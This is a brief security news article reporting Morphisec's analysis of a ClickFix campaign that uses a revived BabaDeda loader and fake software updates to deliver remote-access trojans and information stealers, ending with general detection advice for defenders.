Attackers are reviving the BabaDeda loader in a new ClickFix malware campaign that abuses fake software update flows to deliver remote‑access tools and information‑stealers, according to Morphisec’s latest analysis published Tuesday.
The loader, previously seen in cryptocurrency‑themed attacks, is being used to bypass endpoint defenses by hiding inside seemingly legitimate installers and update helpers.
Morphisec said it blocked multiple intrusion attempts in April 2026 and tied the activity to a significantly evolved BabaDeda loader.
The attack starts by tricking users into running attacker-supplied commands through trusted operating system tools, then moves through hidden PowerShell, in-memory shellcode, DLL sideloading and external payload storage.
The payload chain is designed to deliver information stealers and remote-access trojans. Morphisec tied the code to earlier BabaDeda activity through internal naming and constants, including a workflow name and a hexadecimal marker referencing “BABADEDA.”
ClickFix has become a durable delivery method because it attacks user trust, not only software flaws. ClickFix is a social-engineering attack that tricks a user into “fixing” a fake computer problem by copying and running a malicious command.
Proofpoint previously said ClickFix campaigns have delivered malware families including AsyncRAT, Danabot, DarkGate, Lumma and NetSupport. The campaign also connects to a pattern SPB has tracked in earlier ClickFix coverage.
The practical defense beyond user training is being on the lookout for clipboard-to-run behavior, suspicious PowerShell launched from browser-driven workflows, unusual DLL loads, shellcode staged in memory and outbound calls to payload storage after a user follows a “fix” prompt.
